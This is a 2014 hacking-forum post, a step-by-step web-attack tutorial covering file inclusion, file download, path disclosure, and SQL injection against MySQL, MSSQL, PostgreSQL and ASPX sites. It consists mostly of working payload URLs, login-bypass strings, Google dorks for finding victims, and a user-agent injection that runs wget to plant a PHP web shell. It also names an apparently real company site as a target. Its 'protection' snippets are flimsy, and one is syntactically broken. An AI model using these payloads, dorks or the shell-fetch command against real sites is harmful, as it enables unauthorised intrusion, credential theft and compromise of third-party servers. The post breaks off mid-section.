Thread subject: Security Override :: HQ Guide - Web-Hacking Methods Tutorial

Posted by hax366 on 02/12/2014 07:58:18
#1

Hello Hackers !

This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from this here.

Guide content:

[I] - Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass
[5] Protection script

[II] Local file inclusion
[1] LFI?
[2] Finding vulnerable sites
[3] Checking site vulnerability
[4] Proc/self/environ
[5] Shell uploading

[III] Local file download
[1] LFD?
[2] Vulnerable script
[3] Vulnerability check
[4] Exploiting vulnerability
[5] Protection script

[IV] Full path disclosure

[V] MYSQL Injection
[1] Dorks
[2] Loging

[V] SQL Injection - with load file
[1] SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns
[10] Filter bypassing
[11] Site protection from SQL Injection

[VI] MSSQL Injection
[1] Finding number of columns
[2] Finding database version
[3] Finding table name
[4] Finding column name
[5] Taking data from columns

[VII] Blind SQL Injection
[1] Blind SQL Injection?
[2] Site vulnerability check
[3] Finding database version
[4] MYSQL user
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[8] Taking data from columns using sqpmap

[IX] Postgre SQL Injection
[1] Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns

[X]Error based Postgre SQL Injection
[1] Error based Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding database version
[5] Finding table name
[6] Finding column name
[7] Taking data from columns

[XI] SQL Injection on ASPX
[1] Site vulnerability check
[2] Finding table name
[3] Finding column name
[4] Finding columns in admin table
[5] Finding username and password

[XII] Dot net nuke

[XIII] XSS
[1] XSS?
[2] Required stuff
[3] XSS types
[4] Testing XSS vulnerability
[5] Cookie stealing
[6] Filter bypassing

[XIV] CRLF
[1] CRLF?
[2] Vulnerable places
[3] Exploiting vulnerability and protection
[4] Vulnerable script

[XV] CSRF
[1] CSRF?
[2] Vulnerable places
[3] Exploiting vulnerability

[XVI] Server Side Includes | Server Side Inclusion
[1] Introduction Server Side Includes
[2] SSI creating
[3] Server Side Inclusion


END

So lets get started!

1) RFI?
RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed.
Example:
Code
http://www.site.com/index.php?page=home




Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format.

2) Vulnerable script

Code
<?php
$page = $_GET['page'];
include($page);
?>




3) Exploiting vulnerability
We have site:
Code
http://www.site.com/index.php?page=home




Now instead of home we gonna use our shell.
So we get:
Code
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?




If site is vulnerable it should show shell with list of files from site you are attacking.

4) Null byte bypass
In some scripts there is a weak protection which is gonna include file and add html extension, or some other:
Code
<?php
$page = $_GET['page'];
include($page.".html");
?>




In that case we are going to use null byte bypass(%00).
Everything after %00 would not count and use. We are also using %00 for picture upload bypass as php, but I am not going to talk about it.

So link should look like this:
Code
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00




5) Protection script
Script should look like this:
Code
<?php
$page = $_GET['page'];
include($page);
?>




So we are going to add some stuff to protect it:
Code
<?php
$page = $_GET['page'];
if(file_exists("pages/".$page) {
include($page);
}
?>





[II] Local file inclusion

1) LFI?
LFI can be used on sites like:
Code
http://link.com/index.php?page=




by adding
Code
../../../../../../etc/passwd



(sometimes you have to add %00 on passwd).

2) Finding vulnerable sites:
Code
index.php?page=
index.php?option=
search.php?word=




3) Checking site vulnerability:
Find some site and use
Code
../../../../../../../../../../../etc/passwd



or
Code
../../../../../../../../../../../etc/passwd%00




When you enter this to link you get this:
Code
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false ntp:x:103:106::/home/ntp:/bin/false snmp:x:104:65534::/var/lib/snmp:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin



which means that site is vulnerable.

4) proc/self/environ

Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on the site.

Instead of etc/passwd%00 we are going to put /proc/self/environ

If page prints this:
Code
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........




then proc/self/environ is enabled so we can upload the shell.

5) Shell uploading

To upload the shell we need Mozilla Firefox:
Code
http://www.mozilla.com/firefox/




Add-on Tamper Data:
Code
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/




Open site etc:
Code
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ




Tools > Tamper Data
click Start Tamper then refresh page and in user agent put next code:
Code
<?system('wget www.link.com/shell.txt -O shell.php');?>




Click OK. To access shell use:
Code
www.link.com/shell.php




[III] Local file download

1) LFD?
LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST method using add-on Tamper Data.
Code
http://site.com/download_file.php?file=notepad.exe




2) Vulnerable script
Code
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>




3) Vulnerability check

To check if script is vulnerable we are gonna try to download etc/passwd.
So instead of:
Code
http://site.com/download_file.php?file=notepad.exe




We are gonna use:
Code
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd




If it starts to download and if it open file in text editor it look something like this:
Code
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin




Script is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.

4) Exploiting vulnerability

Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way:
Code
http://site.com/download_file.php?filel=../




../ is gonna back us one directory backward and download file.

1.1 It is possible when it download file and open in text editor to print file list in directories.
1.2 or it is either possible to download file but when it is opened in text editor file is empty.

In case 1.1 we dont have to guess file name and directory and we can download whatever we want.
In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier).

5) Protection script

We have script mentioned at start:
Code
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>




by adding if(file_exists("download/".$file) we are gonna secure script.
So it should look like:
Code
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
if(file_exists("download/".$file)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}




[IV] Full path disclosure

This method let you over errors in file or over errors made by programmers to let you see which files are in which directories, over it you can't directly hack site, it just let you help while hacking.

It is useful because it can help you in faster and easier hacking, also it can help you with Local File Inclusion (LFI), when folder name is changed, or some other file. You can findout using FPD.

There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important.

1st is over array, by adding square brackets on link like this one:
Code
index.php?page=home




To finish vulnerability attack is to add [] on destined place:
Code
index.php?page[]=home.




That will give you error like this:
Code
Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211




From this you can see on site is it exists directory blah.

2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java-injection, by adding java code on site you will get error.

This is a javascript code:
Code
javascript:void(document.cookie='PHPSESSID=');




add that in your address bar and hit enter, now when page is refreshed you will get this error:
Code
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58




then try to open directory thems on site, that should list you files in that directory.

Protection:
Most simple way to protect from this attacks is to turn-off error reporting.
edit or add:
Code
error_reporting(0);




[V] MYSQL Injection

1) Dorks
Code
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp




I am going to use:
Code
http://site.com/Admin_Login.asp




2) Logging

Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--

Instead of password' or 1=1 you can use some of these:
Code
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'




password' or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to use admin panel.

[VI] SQL Injection

1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format:
Code
http://www.link.com/index.php?id=




You can put anything else instead of index.

2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites:
Code
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=




3) Site vulnerability check:
There are 2 ways to check if site is vulnerable.

1st way, we got link:
Code
http://site.com/book.php?id=141




we are gonna add only ' at end of link so we get this link:
Code
http://site.com/book.php?id=141'




2nd way, we got link:
Code
http://site.com/book.php?id=141




we are going to add +and+1=2-- at end of link so we get:
Code
http://site.com/book.php?id=141+and+1=2--




If some part of page disappear (picture, text or something) or any error like (You have an error in your SQL syntax) site is vulnerable.

4) Finding number of columns
We can do it by using function order by, on link:
Code
[http://site.com/book.php?id=141




adding +order+by+5--
Code
http://site.com/book.php?id=141+order+by+5--




If page is opens normal there is more then 5 columns. Lets try with 10.
Code
http://site.com/book.php?id=141+order+by+10--




Now some part of site disappeared, which means that there's more then 5 and less then 10 columns. Lets try 7.
Code
http://site.com/book.php?id=141+order+by+7--




Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8.
Code
http://site.com/book.php?id=141+order+by+7--




on column 8 part of site disappear which means that there is 7 columns.

5) Finding vulnerable columns

Finding vulnerable columns is done with function union select all on link (in this case) we are going to add +union+select+all+1,2,3,4,5,6,7--
Code
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--




It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are going to take from second column.

6) Finding database version

As I said we are gonna take data from second column. Instead of number 2 we are going to put version() or @@version
Code
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--




on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version.

We have version 5.0.51a-24+lenny5 which means that we don't have to guess name of table and column.

7) Finding table names

If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step.
Names of some possible tables:
Code
admin
admins
user
users
member
members




Names of some possible columns:
Code
username
uname
un
user
name
nick
password
pw
pwd
passwd




If database version is 5 we can take name of table by doing next step: instead of number 2 we going to put group_concat(table_name) and after number of last column +from+information_schema.tables+where+table_schema=database()--

So we get this link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schem&#8203;a.tables+where+table_schema=database()--




Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table.

8) Finding column name

We found table name that we want and now from that we want to take columns. Instead of group_concat(table_name) we are going to put group_concat(column_name) and instead of +from+information_schema.tables+where+table_schema=database()-- we are going to put +from+information_schema.columns+where+table_name=hex-- instead of hex we have to encrypt in hex name of table.

Go to:
Code
http://www.string-functions.com/string-hex.aspx




write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now can see the columns:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_sche&#8203;ma.columns+where+table_name=0x7573657273--




9) Taking data from columns

We got: id, name, surname, username, password, level.
We need only username and password.

Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead of from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--

and we have link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users&#8203;--




and result e.g.:
Code
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga




which is users and passwords from this site.

10) Filter bypassing

In case when you write union+select+all says "not accessible" then change it to UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */)
On some sites there is also restricted database version so you can use unhex(hex(version()))

11) Site protection from SQL Injection

Just put this code in your script:
Code
if(!is_numeric($_GET['id']))
{
echo 'It is gonna write text when some try to add /' or and+1=2';
}




SQL Injection - Load File

You found site with SQL vulnerability, now you can try to access table mysql.user and file privileges.

To so which is user and do we have user privileges we are adding 'user' instead of a vulnerable column and at end of URL adding '+from+mysql.user--'.

It should look like this:
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--





If you get username, it means that you have access to mysql.user table and you can continue with this tut.

Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)' and of course '+from+mysql.user--'

Now when on page usernames and file priv. are listed you must find username which was written at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y' which is Yes. You have privileges.

Load File:

All we have to do is to write on vulnerable column load_file('FILE NAME').
We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd').

Which looks like this:
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--




If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file name.

Hex e.g.
If we convert file name in Hex, before file name we will add '0x'
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+m&#8203;ysql.user--




Hex code '2f6574632f706173737764' works for '/etc/passwd'.

It is recommended for Hex:
Code
www.string-functions.com/string-hex.aspx




If you decide to convert file in Char then add 'load_file(char(converted file to char))'

Which looks like:
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,1&#8203;15,119,100),4--




Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'

Char converter:
Code
http://pookey.co.uk/binary.php




[VII] MSSQL Injection

1) Finding number of columns

I will use:
Code
http://www.site.com/sr/page/member.asp?id=234




To find column number we gonna use order by function. We will add +order+by+5-- at end of link.
Code
http://www.site.com/sr/page/member.asp?id=234+order+by+5--




So we will get this error:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list.

/sr/page/member.asp, line 38




which means that there is less then 5 columns, lets try with 4. We get same error, so we gonna try with 3 and we get next error:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.

/sr/page/member.asp, line 44




Which means that there is 3 columns.

2) Finding database version

To find database version we are using @@version.
Code
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--




and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/sr/page/member.asp, line 38





and from here we can see database version.

3) Finding table name

With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables&#8203;--




and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int.

/sr/page/member.asp, line 38




and we can see that we have a table called 'Country'.

Now we have to find other tables. We are going to use not+in function. So we have link:
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables&#8203;+where+table_name+not+in('Country')--




and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int.

/sr/page/member.asp, line 38




and from here we can see that we have a Admin table.

4) Finding column name

It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this case we will use where+table_name='Admin'--. So we have link:
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.colum&#8203;ns+where+table_name='Admin'--




and we have error:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int.

/sr/page/member.asp, line 38




From here we can see that we have column USERNAME. Now we need rest of the columns so we gonna use again not+in function.
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.colum&#8203;ns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--




and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int.

/sr/page/member.asp, line 38




So columns is PASSWD.

5) Taking data from columns

Now we have to put name of table instead of table_name and everything after from we are entering the name of the table.
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--




We get username OjuZwqAul.

It is same for password:
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--




We get password M7sWt2!2uq.

[VIII] Blind SQL Injection

1) Blind SQL Injection?

Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not writing any errors, any table and column names or column content. So that is why it is called Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind Injection we don't use --i/* */.

2) Site vulnerability check

We have link:
Code
http://www.site.com/index.php?id=1




We will add and 1=2
Code
http://www.site.com/index.php?id=1+and+1=2




If any part of page disappear, it means that site is vulnerable.

3) Finding database version

As we said already in this method nothing is gonna be showed, so we gonna say that database version is 4. If part of site disappear it means that version is not 4, but if everything on page stay as it should it means that version is 4. We gonna use function @@version.
Code
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4




If page is loaded as it should then version is 4, if not, then we will try:
Code
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5




4) MYSQL user

First we will check are we able to use select because it is blocked sometimes.
Code
http://www.site.com/index.php?id=1+and+(select+1)=1




If page is loaded normally we can use select, but if not then we can't use it. Now we will check do we have MYSQL user access.
Code
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1




Same as everything else, if page is loaded normally we have access to mysql.user, if not then we don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.

5) Finding table name

To find table names all we have to do is guess. First we gonna find table name then after column name from table.
We have link and we are gonna try to get names of different tables. If page is loaded normally it means that table name is there and exists.
Code
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1




Our main objective is to to find data from admin table, we can also use:
Code
admin
administrator
member
login
members
adm
user
users
tbl_admin




6) Finding column name

Now when we found name of table we wanted it is time to find column name. We doing same as for table. There is name matching, if page is loaded normally then column exists. We need logging data so commonly columns gonna be:
Code
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass




Link that we use for columns is:
Code
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)from+ime_tabele+li&#8203;mit+0,1)=1




7) Taking data from columns

In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ASCII table.
Code
http://www.asciitable.com/




We will look only for DEC and CHR ASCII tables. First we gonna get username, getting letter by letter. So we need to guess DEC for some letter, e.g. for A it is 65.
We have link:
Code
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+&#8203;limit+0,1)1,1))>from DEC number




If page load normally we found are real letter for username. To find our second letter change +limit+0,1 to +limit+1,1.
So now we are guessing second letter... It is same for password... So after long long time we get username and password. If there is more users and if you want to get their passwords too you will have to add where function.
So it should look like:
Code
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+&#8203;where+column_name=something+limit+0,1)1,1))>from DEC letter




To use where for second column_name we usually using id, but we can also use other stuff. e.g. for id:
Code
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+&#8203;where+id=1+limit+0,1)1,1))>from DEC letter




8) Taking data from columns using sqlmap

As you noticed already that you need a lot of time to get data from columns I would suggest you to use sqlmap.
Download:
Code
http://sqlmap.org/




Python download:
Code
http://www.python.org/download/




Now we have to find directory where sqlmap is located.
Start>run>cmd and find sqlmap directory using cd function.
Function to start sqlmap for getting data with Blind SQL Injection for windows is:
Code
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"




NOTE: for unix put python before sqlmal.py
So it should look like:
Code
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"




If there is more users as I said then use id:
Code
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"




After -u you put link.
After -p you put parameter which is vulnerable (in our case id).
-a we are using for some random user agen-t from txt/user-agents.txt
-v1 is verbose
After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part of text who dissapear if case is false).
-e is command that we want to execute. In our case this one:

Code
SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1




[IX] Postgre SQL Injection

1) Postgre SQL Injection?

Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions that we will use, you will see.

1) Finding vulnerable sites

Finding site vulnerability is same as usual SQL Injection, which means that we can use Google dorks.
Here is some:
Code
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=




3) Site vulnerability check

You found site that may be vulnerable. To check if site is vulnerable we will add ' at end of link.
Code
http://www.link.com/page.php?page=1'




So if on page we get:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near




or some part of page disappear then site is vulnerable.

4) Finding number of columns

So we know that site is vulnerable, now we need to find column number. We will do it with union function this time.
Our link:
Code
http://www.link.com/page.php?page=1+union+select+all+null--+-




If page is loaded normally that means that there is more columns.

Code
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual--




We are adding null all the time till we get error. If we get error with 7 null, it means that we have 6 columns, which means 6 nulls.

5) Finding vulnerable columns

It is just so easy to find column vulnerability. Null = 0, which means that everything you put instead of certain null, if nothing happens it means that columns is not usable. That is how we gonna find vulnerable column.
So:
Code
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-




If there is nothing listed, it means that column is not usable we will move on next, and this one back to null.

6) Finding database version

We are doing this with version() function.
Link will show us the version:
Code
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-




we will get something like:
Code
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit




7) Finding table name

Same as usual SQL Injection, only diff. is that instead of column number we have null.
So it should look like:
Code
http://www.link.com/page.php?page=1+union+select+all table_name,null,null,null+from+information_schema.tables--+-




We will get table names also the columns from tables.

8) Finding column name

It is also easy, and there is no big difference.
This is how it should look like:
Code
http://www.link.com/page.php?page=1+union+select+all column_name,null,null,null+from+information_schema.columns+where+table_name=user&#8203;s--+-




Sometimes this wont work so we need to convert = from ascii in decimal.
You can use this site:
Code
http://easycalculation.com/ascii-hex.php




So we have link:
Code
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_sch&#8203;ema.columns+where+table_name||CHR(61)||users--+-




9) Taking data from columns

Also almost same as usual SQL Injection:
Code
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-




[X]Error based Postgre SQL Injection


1) Error based Postgre SQL Injection?

Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference is that you can get all tables, columns and values from columns etc. As title says attack is based on errors, and all results will be shown in errors.

2) Finding vulnerable sites

Use Google dorks:
Code
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=




3) Site vulnerability check

Add ' at end of link:
Code
http://www.link.com/page.php?page=1'




so if we get:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near




site is vulnerable.

4) Finding database version

Use version() function. In this type of attack query looks a bit complicated then usual SQL Injection so don't get confused.
Code
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--




If function is loaded successfully you will get this on page:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"




from where we get database version:
Code
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit




5) Finding table name

As I said at start we are not able to get all tables in same time so we gonna use limit and offset functions.

We will use offset to say which result from base we want to list.
Our link:
Code
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+lim&#8203;it+1+offset+0)+as+int)--




on page we will get this error:
Code
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type"




from this we have table pg_type.

to get next table we gonna change offset to 1:
Code
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+lim&#8203;it+1+offset+1)+as+int)--




and we gonna get table like pg_attribute.

6) Finding column name

First you have to do is to convert table name into decimal.
We will use:
Code
http://easycalculation.com/ascii-hex.php




type string admin and you will get decimal code:
Code
97 100 109 105 110




We will change this code a bit, so it should look like this:
Code
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)




Now we will put it for table names and get columns.
Code
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+w&#8203;here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+&#8203;offset+0)+as+int)--




and we will get column id. We gonna change offset all the time till site back us on home page, which means that there is no more columns in that table.

7) Taking data from columns

We found column username and password and now we want to get data from column.
Code
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limi&#8203;t+1+offset+0)+as+int)--




and we will get this:
Code
admin:21232f297a57a5a743894a0e4a801fc3




CHR(58) presents two points (:) and we use to get two columns at same time.

NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you should figure it out till now already. So I'm gonna use pics and codes only.

[XI] SQL Injection on ASPX

1) Site vulnerability check

Vulnerable link:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton




We will add order by 1--:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--




If you get page error go to:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535




2) Finding column name

Go to:
Code
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1




